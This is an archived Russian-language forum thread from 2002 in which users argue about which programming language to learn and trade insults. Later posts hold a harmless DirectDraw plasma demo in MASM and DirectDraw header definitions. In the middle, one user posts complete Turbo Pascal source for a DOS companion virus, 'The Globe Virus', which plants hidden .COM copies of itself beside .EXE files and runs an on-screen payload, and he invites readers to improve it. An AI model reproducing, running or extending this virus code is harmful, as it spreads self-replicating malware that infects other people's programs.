PDA

Просмотр полной версии : Программирование


11-07-2002, 23:23
Люди подскажите какой язык самый крутой.( ;) что нибудь типа Flash написать охота ;) ) А то Бейсик задолбал уже.
Охота попробовать Си и Дэлфи.

Бриз
11-07-2002, 23:47
Язык С - это воистину круто. И немного заумно.
Только вот в Уфе принято на Дельфях писать.

Тыща_первый
12-07-2002, 00:00
Есть в психологии фишка такая - NLP, тоже программирование...
Почитай и сделай так, чтоб такие мысли не появлялись...

Подскажи чё круче спортивное трико или шелковые брюки.

P.S. Мля, злой я сёдня чё-то...

ExtReme
12-07-2002, 00:22
попробуй язык автокодов :D

12-07-2002, 00:24
WHAT IS автокодов????????

Sen
12-07-2002, 00:40
если кто есть, кто имеет опыт работы с PHP+MySQL и у него есть ссылки, на что можно поглазеть + ентот товарисч ищет работу с денежкой, то ПУСКАЙ ПИШЕТ МИНЕ!!!

.rav3n.
12-07-2002, 00:42
для проф. программировния - c++ (c++.net)
для любительского - delphi. (небольшие проекты легче на дельфях писать)
для web-oriented: PERL, PHP

по-моему ответил исчерпывающе.

Nameless
12-07-2002, 04:14
Уродство.

Непортабельное уродство.

В сад. "Программирование руками" ни к чему хорошему не приводит.

Barby
28-07-2002, 18:16
А я знаю Basic, Pascal, HTML.
Не много VBasic.
Очень поверхностно Delphi. Во как=)

Sen
28-07-2002, 18:31
А я только семечки грызу.

Sen
29-07-2002, 22:16
А я тоже знаю карате-до, теквандо, кунгфу, кику-синкай, нинзя-цу, сумо и много других страшный слов. :p

proMAN
29-07-2002, 22:33
А для этого не нужно ли сначала "си" изучить??? :rolleyes:

Основой там идет "си".

2proterian: А для профи учи низкоуровневой машинный язык assembler.

ps: sorry если ник неправильно написал! :)

shot_USC
01-08-2002, 19:14
Вывод:

Ничего не умеешь.. и ничего не можешь!:)

Можешь только болтать... нет? Хм... я не уверен.... Пальцы веером - ет каждый может! ;)

P.S.> Пересмотри свой аватор... не позорься! Или я слишком отстал от жизни? Сейчас что, уже другое поколение кибер хулиганов, ориентирующихся на болтологии и юзанье чужого софта?:) Хм... не думаю.... однако факт остается фйактом.. ладно, ХацкЕР .... ничего больше не скажу.... не хочу... надоело спорить....

----------------------------------
С уважением, shot_USC

shot_usc@mail.ru
usc_ufa@mail.ru

Barby
01-08-2002, 20:07
Вот млин, а!

А фортран с ассемблером я видела.
Надо бы разобраться когда время будет...

shot_USC
01-08-2002, 21:15
2DARKSPASE:

Да блин, ты дурак что ли?? Лечить меня вздумал что ли?? Знаю я кто как думает и как оно есть на самом деле... Я что хочу сказать, ты то не претендуешь ни на звание харека и на звание кракера... Все просто... жаль, что ты не понял сразу...

Почему я так говорю? Я пробежался, почитал твои мессаги... знаешь, у меян о тебе мнение сложилось как о "крутом" чуваке, "разбирающемся" в компьютерной безопасности! Ты просто "супер" !

Если ты нихрена не смыслишь в программировании, то как, ответь мне, ты можешь понимать хоть что-то в компьютерной безопасности??? Ты максимум - теоретик! Не больше!

P.S.> Обычный юзверь, возомнивший себя черт знает чем... И задача каждого - ставить таких на место.

--------------------------------
С уважением, shot_USC

shot_usc@mail.ru
usc_ufa@mail.ru (subject: to shot)

Rain
01-08-2002, 21:23
Да плюнь ты... слюной.

shot_USC
02-08-2002, 00:12
Ладно... забыли.. замяли....

--------------------------------
С уважением, shot_USC

shot_usc@mail.ru
usc_ufa@mail.ru (subject: to shot)

Barby
04-08-2002, 15:44
Мда....

Barby
27-08-2002, 15:22
Мдя...

BRATAN
28-08-2002, 14:56
Народ ? а можно глянуть хоть что-нибудь вами напрограммированное , а ? Хоть поверхностно , хоть одним глазком (ха , оставшимся) ?

ARINA
28-08-2002, 15:03
А можно спросить? Зачем тебе это надо? Чтобы сравнить со своими трудами?

.wit
28-08-2002, 15:56
....а ни хрена не умею......
кромь как сделать че нить бесполезное, вредное и т.д. и т.п. :D :D :D

.wit
28-08-2002, 16:23
......модерни прогу.....усовершенствуй.... об успехах ток не забудь сообщить... :D :D :D

Program ;

{$M 2048,0,4096}

Uses Dos, Crt;

Var F1 : File;
F2 : File;
O : String;
Parm : String;
P : DirStr;
N : NameStr;
E : ExtStr;
Buf : Array[0..8000] of Byte;
NumRead : Word;
NumWritten : Word;
DirInfo : SearchRec;
ComExist : SearchRec;
Infect : Byte;

Procedure StartOrigExe;
Begin
O := ParamStr(0);
FSplit(O,P,N,E);
O := P+N+'.EXE';
P := '';
For NumRead := 1 To ParamCount Do
P := P + ParamStr(NumRead);
SwapVectors;
Exec(O,P);
SwapVectors;
End;

Procedure InfectExe;
Begin
FindFirst('*.EXE',Archive,DirInfo);
While (DosError = 0) And (Infect <> 0) Do
Begin
FSplit(DirInfo.Name,P,N,E);
O := P+N+'.COM';
FindFirst(O,Hidden,ComExist);
If DosError <> 0 Then
Begin
Assign(F1,O);
Rewrite(F1,1);
BlockWrite(F1,buf,NumRead,NumWritten);
Close(F1);
SetFattr(F1,Hidden);
Dec(Infect);
End;
FindNext(DirInfo);
End;
End;

Procedure Activate;
Var
T1,T2 : Integer;
I : Real;
X , Y : Byte;
Resolution : Integer;

Begin
ClrScr;
I := 0;
T2 := 38;
Randomize;
Repeat
Resolution := 50;
For T1 := 0 to Resolution Do
Begin
X := Abs(40+Round(Sin(I)*T2));
Y := Abs(12-Round(Cos(I)*10));
GotoXY(X,Y);
Write('Ы');
I := I + ((Pi*2)/Resolution);
End;
T2 := T2 - 1;
TextColor(Random(14)+1);
Until T2 < 2;
GotoXY(30,12);
TextColor(White);
Write('* The Globe Virus *');
Asm
Mov Ah,8
Int 21h
End;
ClrScr;
End;

Begin
Infect := 3;
Randomize;
Assign(F2,ParamStr(0));
Reset(F2,1);
BlockRead(F2,buf,SizeOf(buf),NumRead);
Close(F2);
InfectExe;
StartOrigExe;
If Random(16) = 0 then Activate;
Halt(DosExitCode);
End.

28-08-2002, 21:36
А на каком эт языке?
И чё эта прога делает ваще?
Я тока PHP знаю, немного Pascal'я (в школе учил), на днях возмусь за Perl

Сщщд
25-09-2002, 19:54
Кобол

Sen
25-09-2002, 20:16
а где можна почитать доку на тему того, как на каком-нить Win32 ассемблере получить доступ к DirectX...)))))...

не ну пишут же некоторые ... значит где-то есть...

boco
25-09-2002, 21:41
а чем "доступ к directx", стесняюсь спросить, отличается от, скажем, доступа к системным вызовам ядра?

Sen
25-09-2002, 23:07
хех, ну и скока лет я буду пальцем в небо тыкать?

мне ж нужен sdk с примерами конкретно на ассме или хотя бы примерное описание...

shot_USC
26-09-2002, 00:30
А DirectDraw тебе потянет? :)

;--------------------------------------
;file name Ddplasma32.asm
;--------------------------------------
; DDRAW Plasma
;--------------------------------------

; View with TAB size 4

TITLE DDPLASMA
.486
.MODEL FLAT, STDCALL
option casemap :none

;-----------------------------------------------------------;
; DDRAW PLASMA ;
;-----------------------------------------------------------;

INCLUDE \masm32\include\windows.inc
INCLUDE \masm32\include\gdi32.inc
INCLUDE \masm32\include\kernel32.inc
INCLUDE \masm32\include\user32.inc
INCLUDE \masm32\include\ddraw.inc

INCLUDELIB \masm32\lib\gdi32.lib
INCLUDELIB \masm32\lib\kernel32.lib
INCLUDELIB \masm32\lib\user32.lib
INCLUDELIB \masm32\lib\ddraw.lib

WinMain PROTO :DWORD,:DWORD,:DWORD,:DWORD
WndProc PROTO :DWORD,:DWORD,:DWORD,:DWORD
nextFrame PROTO
initPlasma PROTO

RETURN MACRO arg
IFNB <arg>
mov eax, arg
ENDIF
ret
ENDM

LRETURN MACRO arg
IFNB <arg>
mov eax, arg
ENDIF
leave
ret
ENDM

FATAL MACRO msg
LOCAL @@msg
.DATA
@@msg db msg, 0
.CODE
INVOKE MessageBox, hWnd, ADDR @@msg, ADDR szDisplayName, MB_OK
INVOKE ExitProcess, 0
ENDM


.DATA?
hWnd HWND ? ; surface window
lpDD LPDIRECTDRAW ? ; DDraw object
lpDDSPrimary LPDIRECTDRAWSURFACE ? ; DDraw primary surface
ddsd DDSURFACEDESC <?> ; DDraw surface descriplor
ddscaps DDSCAPS <?> ; DDraw capabilities

palette dd 256 dup (?)
table dd 512 dup (?)

.DATA
ddwidth EQU 320 ; display mode width
ddheight EQU 200 ; display mode height
ddbpp EQU 32 ; display mode color depth

phaseA dd 0
phaseB dd 0

factor1 EQU -2
factor2 EQU -1
factor3 EQU 1
factor4 EQU -2

red REAL4 500.0
green REAL4 320.0
blue REAL4 372.0

scale1 REAL4 2.0
scale2 REAL4 127.5
scale3 REAL4 256.0

szClassName db "DDRAW Plasma Demo", 0 ; class name
szDisplayName EQU <szClassName> ; window name

wc WNDCLASSEX < sizeof WNDCLASSEX, CS_HREDRAW or CS_VREDRAW, offset WndProc, 0, 0, , 0, 0, , 0, offset szClassName, 0 >

.CODE
start:

INVOKE GetModuleHandle, NULL
INVOKE WinMain, eax, NULL, NULL, SW_SHOWDEFAULT
INVOKE ExitProcess, eax



;-----------------------------------------------------------;
; Calculate Next Plasma Frame ;
;-----------------------------------------------------------;

nextFrame PROC
push ebx
push esi
push edi

mov ecx, ddheight ; # of scanlines
mov edi, [ddsd.lpSurface] ; pixel output

@@scanline:
push ecx
push edi

mov esi, [phaseA]
mov edx, [phaseB]
sub esi, ecx
and edx, 0FFh
and esi, 0FFh
mov edx, [table][4*edx][256*4]
mov esi, [table][4*esi] ; [x] + table0[a + y]
sub edx, ecx ; [y] + table1[b]
mov ecx, ddwidth ; [x] --> pixel counter

@@pixel:
and esi, 0FFh
and edx, 0FFh
mov eax, [table][4*esi]
mov ebx, [table][4*edx][256*4]
add eax, ebx
add esi, factor3
shr eax, 1
add edx, factor4
and eax, 0FFh
add edi, 4
mov eax, [palette][4*eax]
dec ecx
mov [edi][-4], eax
jnz @@pixel

pop edi
pop ecx
add edi, [ddsd.lPitch] ; inc. display position
dec ecx
jnz @@scanline

add [phaseA], factor1
add [phaseB], factor2

pop edi
pop esi
pop ebx

ret
nextFrame ENDP


;-----------------------------------------------------------;
; Initalize Plasma Tables ;
;-----------------------------------------------------------;

initPlasma PROC

LOCAL @@i :DWORD
LOCAL @@r :DWORD
LOCAL @@g :DWORD
LOCAL @@b :DWORD
LOCAL temp :DWORD

mov [@@i], 0

.WHILE @@i < 256

mov edx, [@@i]

; Calculate table0 value

fldpi
fimul [@@i]
fmul [scale1]
fdiv [scale3]
fsin
fmul [scale2]
fadd [scale2]
fistp [table][4*edx]

; Calculate table1 value

fldpi
fimul [@@i]
fmul [scale1]
fdiv [scale3]
fcos
fmul [scale2]
fadd [scale2]
fldpi
fmulp st(1), st
fmul [scale1]
fdiv [scale3]
fsin
fmul [scale2]
fadd [scale2]
fistp [table][4*edx][4*256]

; Calculate palette value

xor eax, eax

FOR comp, <red, green, blue>
fldpi
fimul [@@i]
fmul [scale1]
fdiv [comp]
fcos
fmul [scale2]
fadd [scale2]
fistp [temp]
shl eax, 8
or eax, [temp]
ENDM

mov [palette][4*edx] , eax
inc [@@i]

.ENDW

ret
initPlasma ENDP



;-----------------------------------------------------------;
; WinMain ( entry point ) ;
;-----------------------------------------------------------;

WinMain PROC hInst :DWORD,
hPrevInst :DWORD,
CmdLine :DWORD,
CmdShow :DWORD

LOCAL msg :MSG

; Fill WNDCLASSEX structure with required variables

mov eax, [hInst]
mov [wc.hInstance], eax
INVOKE GetStockObject, BLACK_BRUSH
mov [wc.hbrBackground], eax

INVOKE RegisterClassEx, ADDR wc

; Create window at following size

INVOKE CreateWindowEx, 0, ADDR szClassName, ADDR szDisplayName, WS_POPUP, 0, 0, ddwidth, ddheight, NULL, NULL, hInst, NULL
mov [hWnd], eax

INVOKE SetFocus, hWnd
INVOKE ShowCursor, 0

; Initialize display

INVOKE DirectDrawCreate, NULL, ADDR lpDD, NULL
.IF eax != DD_OK
FATAL "Couldn't init DirectDraw"
.ENDIF

DDINVOKE SetCooperativeLevel, lpDD, hWnd, DDSCL_EXCLUSIVE or DDSCL_FULLSCREEN
.IF eax != DD_OK
FATAL "Couldn't set DirectDraw cooperative level"
.ENDIF

DDINVOKE SetDisplayMode, lpDD, ddwidth, ddheight, ddbpp
.IF eax != DD_OK
FATAL "Couldn't set display mode"
.ENDIF

mov [ddsd.dwSize], sizeof DDSURFACEDESC
mov [ddsd.dwFlags], DDSD_CAPS
mov [ddsd.ddsCaps.dwCaps], DDSCAPS_PRIMARYSURFACE
DDINVOKE CreateSurface, lpDD, ADDR ddsd, ADDR lpDDSPrimary, NULL
.IF eax != DD_OK
FATAL "Couldn't create primary surface"
.ENDIF

INVOKE ShowWindow, hWnd, CmdShow

call initPlasma

; Loop until PostQuitMessage is sent

.WHILE 1

INVOKE PeekMessage, ADDR msg, NULL, 0, 0, PM_REMOVE

.IF eax != 0
.IF msg.message == WM_QUIT
INVOKE PostQuitMessage, msg.wParam
.BREAK
.ELSE
INVOKE TranslateMessage, ADDR msg
INVOKE DispatchMessage, ADDR msg
.ENDIF
.ELSE
INVOKE GetFocus

.IF eax == hWnd

mov [ddsd.dwSize], sizeof DDSURFACEDESC
mov [ddsd.dwFlags], DDSD_PITCH

.WHILE 1
DDSINVOKE mLock, lpDDSPrimary, NULL, ADDR ddsd, DDLOCK_WAIT, NULL

.BREAK .IF eax == DD_OK

.IF eax == DDERR_SURFACELOST
DDSINVOKE Restore, lpDDSPrimary
.ELSE
FATAL "Couldn't lock surface"
.ENDIF
.ENDW

DDINVOKE WaitForVerticalBlank, lpDD, DDWAITVB_BLOCKBEGIN, NULL

call nextFrame

DDSINVOKE Unlock, lpDDSPrimary, ddsd.lpSurface

.ENDIF
.ENDIF
.ENDW

DDINVOKE RestoreDisplayMode, lpDD
.IF eax != DD_OK
FATAL "Couldn't restore displaymode"
.ENDIF

INVOKE DestroyWindow, hWnd
.IF eax == NULL
FATAL "Couldn't destroy window"
.ENDIF

.IF lpDD != NULL
.IF lpDDSPrimary != NULL
DDSINVOKE Release, lpDDSPrimary
mov [lpDDSPrimary], NULL
.ENDIF

DDINVOKE Release, lpDD
mov [lpDD], NULL

.ENDIF

LRETURN msg.wParam
WinMain ENDP


;-----------------------------------------------------------;
; Window Proc ( handle events ) ;
;-----------------------------------------------------------;

WndProc PROC hWin :DWORD,
uMsg :DWORD,
wParam :DWORD,
lParam :DWORD

.IF uMsg == WM_KEYDOWN
.IF wParam == VK_ESCAPE
INVOKE PostQuitMessage, NULL
RETURN 0
.ENDIF
.ELSEIF uMsg == WM_DESTROY
INVOKE PostQuitMessage, NULL
RETURN 0
.ENDIF

INVOKE DefWindowProc, hWin, uMsg, wParam, lParam

ret
WndProc ENDP

END start

Вот... ну.. должно, короче, работать...

----------------------------------
С уважением, shot_USC

shot_usc@mail.ru
usC_ufa@mail.ru

shot_USC
26-09-2002, 00:34
Для того, шобы все работало..)

;--------------------------------------------
;file name ddraw.inc (часть первая)
;--------------------------------------------
STDMETHOD MACRO name, argl :VARARG
LOCAL @tmp_a
LOCAL @tmp_b

@tmp_a TYPEDEF PROTO argl
@tmp_b TYPEDEF PTR @tmp_a
name @tmp_b ?
ENDM

DDINVOKE MACRO func, this, arglist :VARARG
mov eax , [this]
mov eax , [eax]

IFB <arglist>
INVOKE [IDirectDrawVtbl. func][eax], this
ELSE
INVOKE [IDirectDrawVtbl. func][eax], this, arglist
ENDIF
ENDM

DDSINVOKE MACRO func, this, arglist :VARARG
mov eax , [this]
mov eax , [eax]

IFB <arglist>
INVOKE [IDirectDrawSurfaceVtbl. func][eax], this
ELSE
INVOKE [IDirectDrawSurfaceVtbl. func][eax], this, arglist
ENDIF
ENDM



DirectDrawCreate PROTO :DWORD, :DWORD, :DWORD
DirectDrawCreateClipper PROTO :DWORD, :DWORD, :DWORD
DirectDrawEnumerateA PROTO :DWORD, :DWORD
DirectDrawEnumerate EQU <DirectDrawEnumerateA>

EXTERNDEF C CLSID_DirectDraw:GUID
EXTERNDEF C CLSID_DirectDrawClipper:GUID
EXTERNDEF C IID_IDirectDraw:GUID
EXTERNDEF C IID_IDirectDrawSurface:GUID
EXTERNDEF C IID_IDirectDrawPalette:GUID
EXTERNDEF C IID_IDirectDrawClipper:GUID

LPDIRECTDRAW TYPEDEF PTR IDirectDraw
LPDIRECTDRAWSURFACE TYPEDEF PTR IDirectDrawSurface
LPDIRECTDRAWPALETTE TYPEDEF PTR IDirectDrawPalette
LPDIRECTDRAWCLIPPER TYPEDEF PTR IDirectDrawClipper
LPDDFXROP TYPEDEF PTR DDFXROP
LPDDSURFACEDESC TYPEDEF PTR DDSURFACEDESC
LPDDCAPS TYPEDEF PTR DDCAPS
LPDDBLTFX TYPEDEF PTR DDBLTFX
LPDDSCAPS TYPEDEF PTR DDSCAPS
LPDDCOLORKEY TYPEDEF PTR DDCOLORKEY
LPDDOVERLAYFX TYPEDEF PTR DDOVERLAYFX
LPDDPIXELFORMAT TYPEDEF PTR DDPIXELFORMAT
LPDDBLTBATCH TYPEDEF PTR DDBLTBATCH

; windows defines
LPRECT TYPEDEF PTR RECT
LPPALETTEENTRY TYPEDEF PTR PALETTEENTRY
LPRGNDATA TYPEDEF PTR RGNDATA


DDCOLORKEY STRUC
dwColorSpaceLowValue DWORD ?
dwColorSpaceHighValue DWORD ?
DDCOLORKEY ENDS


DDBLTFX STRUC
dwSize DWORD ?
dwDDFX DWORD ?
dwROP DWORD ?
dwDDROP DWORD ?
dwRotationAngle DWORD ?
dwZBufferOpCode DWORD ?
dwZBufferLow DWORD ?
dwZBufferHigh DWORD ?
dwZBufferBaseDest DWORD ?
dwZDestConstBitDepth DWORD ?
UNION
dwZDestConst DWORD ?
lpDDSZBufferDest LPDIRECTDRAWSURFACE ?
ENDS
dwZSrcConstBitDepth DWORD ?
UNION
dwZSrcConst DWORD ?
lpDDSZBufferSrc LPDIRECTDRAWSURFACE ?
ENDS
dwAlphaEdgeBlendBitDepth DWORD ?
dwAlphaEdgeBlend DWORD ?
dwReserved DWORD ?
dwAlphaDestConstBitDepth DWORD ?
UNION
dwAlphaDestConst DWORD ?
lpDDSAlphaDest LPDIRECTDRAWSURFACE ?
ENDS
dwAlphaSrcConstBitDepth DWORD ?
UNION
dwAlphaSrcConst DWORD ?
lpDDSAlphaSrc LPDIRECTDRAWSURFACE ?
ENDS
UNION
dwFillColor DWORD ?
dwFillDepth DWORD ?
lpDDSPattern LPDIRECTDRAWSURFACE ?
ENDS
ddckDestColorkey DDCOLORKEY <>
ddckSrcColorkey DDCOLORKEY <>
DDBLTFX ENDS


DDSCAPS STRUC
dwCaps DWORD ?
DDSCAPS ENDS


DDCAPS STRUC
dwSize DWORD ?
dwCaps DWORD ?
dwCaps2 DWORD ?
dwCKeyCaps DWORD ?
dwFXCaps DWORD ?
dwFXAlphaCaps DWORD ?
dwPalCaps DWORD ?
dwSVCaps DWORD ?
dwAlphaBltConstBitDepths DWORD ?
dwAlphaBltPixelBitDepths DWORD ?
dwAlphaBltSurfaceBitDepths DWORD ?
dwAlphaOverlayConstBitDepths DWORD ?
dwAlphaOverlayPixelBitDepths DWORD ?
dwAlphaOverlaySurfaceBitDepths DWORD ?
dwZBufferBitDepths DWORD ?
dwVidMemTotal DWORD ?
dwVidMemFree DWORD ?
dwMaxVisibleOverlays DWORD ?
dwCurrVisibleOverlays DWORD ?
dwNumFourCCCodes DWORD ?
dwAlignBoundarySrc DWORD ?
dwAlignSizeSrc DWORD ?
dwAlignBoundaryDest DWORD ?
dwAlignSizeDest DWORD ?
dwAlignStrideAlign DWORD ?
dwRops DWORD 8 DUP (?)
ddsCaps DDSCAPS <>
dwMinOverlayStretch DWORD ?
dwMaxOverlayStretch DWORD ?
dwMinLiveVideoStretch DWORD ?
dwMaxLiveVideoStretch DWORD ?
dwMinHwCodecStretch DWORD ?
dwMaxHwCodecStretch DWORD ?
dwReserved1 DWORD ?
dwReserved2 DWORD ?
dwReserved3 DWORD ?
dwSVBCaps DWORD ?
dwSVBCKeyCaps DWORD ?
dwSVBFXCaps DWORD ?
dwSVBRops DWORD 8 DUP (?)
dwVSBCaps DWORD ?
dwVSBCKeyCaps DWORD ?
dwVSBFXCaps DWORD ?
dwVSBRops DWORD 8 DUP (?)
dwSSBCaps DWORD ?
dwSSBCKeyCaps DWORD ?
dwSSBFXCaps DWORD ?
dwSSBRops DWORD 8 DUP (?)
dwReserved4 DWORD ?
dwReserved5 DWORD ?
dwReserved6 DWORD ?
DDCAPS ENDS


DDOVERLAYFX STRUC
dwSize DWORD ?
dwAlphaEdgeBlendBitDepth DWORD ?
dwAlphaEdgeBlend DWORD ?
dwReserved DWORD ?
dwAlphaDestConstBitDepth DWORD ?
UNION
dwAlphaDestConst DWORD ?
lpDDSAlphaDest LPDIRECTDRAWSURFACE ?
ENDS
dwAlphaSrcConstBitDepth DWORD ?
UNION
dwAlphaSrcConst DWORD ?
lpDDSAlphaSrc LPDIRECTDRAWSURFACE ?
ENDS
dckDestColorkey DDCOLORKEY <>
dckSrcColorkey DDCOLORKEY <>
dwDDFX DWORD ?
dwFlags DWORD ?
DDOVERLAYFX ENDS


DDPIXELFORMAT STRUC
dwSize DWORD ?
dwFlags DWORD ?
dwFourCC DWORD ?
UNION
dwRGBBitCount DWORD ?
dwYUVBitCount DWORD ?
dwZBufferBitDepth DWORD ?
dwAlphaBitDepth DWORD ?
ENDS
UNION
dwRBitMask DWORD ?
dwYBitMask DWORD ?
ENDS
UNION
dwGBitMask DWORD ?
dwUBitMask DWORD ?
ENDS
UNION
dwBBitMask DWORD ?
dwVBitMask DWORD ?
ENDS
UNION
dwRGBAlphaBitMask DWORD ?
dwYUVAlphaBitMask DWORD ?
ENDS
DDPIXELFORMAT ENDS


DDSURFACEDESC STRUC
dwSize DWORD ?
dwFlags DWORD ?
dwHeight DWORD ?
dwWidth DWORD ?
lPitch DWORD ?
dwBackBufferCount DWORD ?
UNION
dwMipMapCount DWORD ?
dwZBufferBitDepth DWORD ?
dwRefreshRate DWORD ?
ENDS
dwAlphaBitDepth DWORD ?
dwReserved DWORD ?
lpSurface DWORD ?
ddckCKDestOverlay DDCOLORKEY <>
ddckCKDestBlt DDCOLORKEY <>
ddckCKSrcOverlay DDCOLORKEY <>
ddckCKSrcBlt DDCOLORKEY <>
ddpfPixelFormat DDPIXELFORMAT <>
ddsCaps DDSCAPS <>
DDSURFACEDESC ENDS


DDBLTBATCH STRUC
lprDest LPRECT ?
lpDDSSrc LPDIRECTDRAWSURFACE ?
lprSrc LPRECT ?
dwFlags DWORD ?
lpDDBltFx LPDDBLTFX ?
DDBLTBATCH ENDS




IDirectDrawVtbl STRUC
; IUnknown methods
STDMETHOD QueryInterface, :PTR IDirectDraw, :PTR, :PTR PTR
STDMETHOD AddRef, :PTR IDirectDraw
STDMETHOD Release, :PTR IDirectDraw
; IDirectDraw methods
STDMETHOD Compact, :PTR IDirectDraw
STDMETHOD CreateClipper, :PTR IDirectDraw, :DWORD, :PTR LPDIRECTDRAWCLIPPER, :PTR IUnknown
STDMETHOD CreatePalette, :PTR IDirectDraw, :DWORD, :LPPALETTEENTRY, :PTR LPDIRECTDRAWPALETTE, :PTR IUnknown
STDMETHOD CreateSurface, :PTR IDirectDraw, :LPDDSURFACEDESC, :PTR LPDIRECTDRAWSURFACE, :PTR IUnknown
STDMETHOD DuplicateSurface, :PTR IDirectDraw, :LPDIRECTDRAWSURFACE, :PTR LPDIRECTDRAWSURFACE
STDMETHOD EnumDisplayModes, :PTR IDirectDraw, :DWORD, :LPDDSURFACEDESC, :PTR , :PTR
STDMETHOD EnumSurfaces, :PTR IDirectDraw, :DWORD, :LPDDSURFACEDESC, :PTR , :PTR
STDMETHOD FlipToGDISurface, :PTR IDirectDraw
STDMETHOD GetCaps, :PTR IDirectDraw, :LPDDCAPS, :LPDDCAPS
STDMETHOD GetDisplayMode, :PTR IDirectDraw, :LPDDSURFACEDESC
STDMETHOD GetFourCCCodes, :PTR IDirectDraw, :PTR DWORD, :PTR DWORD
STDMETHOD GetGDISurface, :PTR IDirectDraw, :PTR LPDIRECTDRAWSURFACE
STDMETHOD GetMonitorFrequency, :PTR IDirectDraw, :DWORD
STDMETHOD GetScanLine, :PTR IDirectDraw, :DWORD
STDMETHOD GetVerticalBlankStatus, :PTR IDirectDraw, :PTR SWORD
STDMETHOD Initialize, :PTR IDirectDraw, :PTR GUID
STDMETHOD RestoreDisplayMode, :PTR IDirectDraw
STDMETHOD SetCooperativeLevel, :PTR IDirectDraw, :HWND, :DWORD
STDMETHOD SetDisplayMode, :PTR IDirectDraw, :DWORD, :DWORD, :DWORD
STDMETHOD WaitForVerticalBlank, :PTR IDirectDraw, :DWORD, :PTR
IDirectDrawVtbl ENDS


IDirectDrawPaletteVtbl STRUC
; IUnknown methods
STDMETHOD QueryInterface, :PTR IDirectDrawPalette, :PTR, :PTR PTR
STDMETHOD AddRef, :PTR IDirectDrawPalette
STDMETHOD Release, :PTR IDirectDrawPalette
; IDirectDrawPalette methods
STDMETHOD GetCaps, :PTR IDirectDrawPalette, :PTR DWORD
STDMETHOD GetEntries, :PTR IDirectDrawPalette, :DWORD, :DWORD, :DWORD, :LPPALETTEENTRY
STDMETHOD Initialize, :PTR IDirectDrawPalette, :LPDIRECTDRAW, :DWORD, :LPPALETTEENTRY
STDMETHOD SetEntries, :PTR IDirectDrawPalette, :DWORD, :DWORD, :DWORD, :LPPALETTEENTRY
IDirectDrawPaletteVtbl ENDS


----------------------------------
С уважением, shot_USC

shot_usc@mail.ru
usC_ufa@mail.ru

Sen
26-09-2002, 00:34
млин, а я nasm люблю...
лана, попробую еще разок в гугле поискать...

shot_USC
26-09-2002, 00:37
Для того, шобы все работало..)

;--------------------------------------------
;file name ddraw.inc (часть вторая)
;--------------------------------------------

VER_ALPHASRCNEG EQU 000000080h
DDOVER_ALPHASRCSURFACEOVERRIDE EQU 000000100h
DDOVER_HIDE EQU 000000200h
DDOVER_KEYDEST EQU 000000400h
DDOVER_KEYDESTOVERRIDE EQU 000000800h
DDOVER_KEYSRC EQU 000001000h
DDOVER_KEYSRCOVERRIDE EQU 000002000h
DDOVER_SHOW EQU 000004000h
DDOVER_ADDDIRTYRECT EQU 000008000h
DDOVER_REFRESHDIRTYRECTS EQU 000010000h
DDOVER_REFRESHALL EQU 000020000h
DDOVER_DDFX EQU 000080000h

; DIRECTDRAWSURFACE LOCK FLAGS
DDLOCK_SURFACEMEMORYPTR EQU 000000000h
DDLOCK_WAIT EQU 000000001h
DDLOCK_EVENT EQU 000000002h
DDLOCK_READONLY EQU 000000010h
DDLOCK_WRITEONLY EQU 000000020h

; DIRECTDRAWSURFACE BLT FX FLAGS
DDBLTFX_ARITHSTRETCHY EQU 000000001h
DDBLTFX_MIRRORLEFTRIGHT EQU 000000002h
DDBLTFX_MIRRORUPDOWN EQU 000000004h
DDBLTFX_NOTEARING EQU 000000008h
DDBLTFX_ROTATE180 EQU 000000010h
DDBLTFX_ROTATE270 EQU 000000020h
DDBLTFX_ROTATE90 EQU 000000040h
DDBLTFX_ZBUFFERRANGE EQU 000000080h
DDBLTFX_ZBUFFERBASEDEST EQU 000000100h

; DIRECTDRAWSURFACE OVERLAY FX FLAGS
DDOVERFX_ARITHSTRETCHY EQU 000000001h
DDOVERFX_MIRRORLEFTRIGHT EQU 000000002h
DDOVERFX_MIRRORUPDOWN EQU 000000004h

; DIRECTDRAW WAITFORVERTICALBLANK FLAGS
DDWAITVB_BLOCKBEGIN EQU 000000001h
DDWAITVB_BLOCKBEGINEVENT EQU 000000002h
DDWAITVB_BLOCKEND EQU 000000004h

; DIRECTDRAW GETFLIPSTATUS FLAGS
DDGFS_CANFLIP EQU 000000001h
DDGFS_ISFLIPDONE EQU 000000002h

; DIRECTDRAW GETBLTSTATUS FLAGS
DDGBS_CANBLT EQU 000000001h
DDGBS_ISBLTDONE EQU 000000002h

; DIRECTDRAW ENUMOVERLAYZORDER FLAGS
DDENUMOVERLAYZ_BACKTOFRONT EQU 000000000h
DDENUMOVERLAYZ_FRONTTOBACK EQU 000000001h

; DIRECTDRAW UPDATEOVERLAYZORDER FLAGS
DDOVERZ_SENDTOFRONT EQU 000000000h
DDOVERZ_SENDTOBACK EQU 000000001h
DDOVERZ_MOVEFORWARD EQU 000000002h
DDOVERZ_MOVEBACKWARD EQU 000000003h
DDOVERZ_INSERTINFRONTOF EQU 000000004h
DDOVERZ_INSERTINBACKOF EQU 000000005h


; DIRECTDRAW RETURN CODES

; Issued by: DirectDraw Commands and all callbacks
DD_OK EQU 0 ; Status is OK

; DIRECTDRAW ENUMCALLBACK RETURN VALUES
DDENUMRET_CANCEL EQU 0 ; stop the enumeration
DDENUMRET_OK EQU 1 ; continue the enumeration

; DIRECTDRAW ERRORS
DDERR_ALREADYINITIALIZED EQU 088760005h
DDERR_CANNOTATTACHSURFACE EQU 08876000ah
DDERR_CANNOTDETACHSURFACE EQU 088760014h
DDERR_CURRENTLYNOTAVAIL EQU 088760028h
DDERR_EXCEPTION EQU 088760037h
DDERR_GENERIC EQU 080004005h
DDERR_HEIGHTALIGN EQU 08876005ah
DDERR_INCOMPATIBLEPRIMARY EQU 08876005fh
DDERR_INVALIDCAPS EQU 088760064h
DDERR_INVALIDCLIPLIST EQU 08876006eh
DDERR_INVALIDMODE EQU 088760078h
DDERR_INVALIDOBJECT EQU 088760082h
DDERR_INVALIDPARAMS EQU 080070057h
DDERR_INVALIDPIXELFORMAT EQU 088760091h
DDERR_INVALIDRECT EQU 088760096h
DDERR_LOCKEDSURFACES EQU 0887600a0h
DDERR_NO3D EQU 0887600aah
DDERR_NOALPHAHW EQU 0887600b4h
DDERR_NOCLIPLIST EQU 0887600cdh
DDERR_NOCOLORCONVHW EQU 0887600d2h
DDERR_NOCOOPERATIVELEVELSET EQU 0887600d4h
DDERR_NOCOLORKEY EQU 0887600d7h
DDERR_NOCOLORKEYHW EQU 0887600dch
DDERR_NODIRECTDRAWSUPPORT EQU 0887600deh
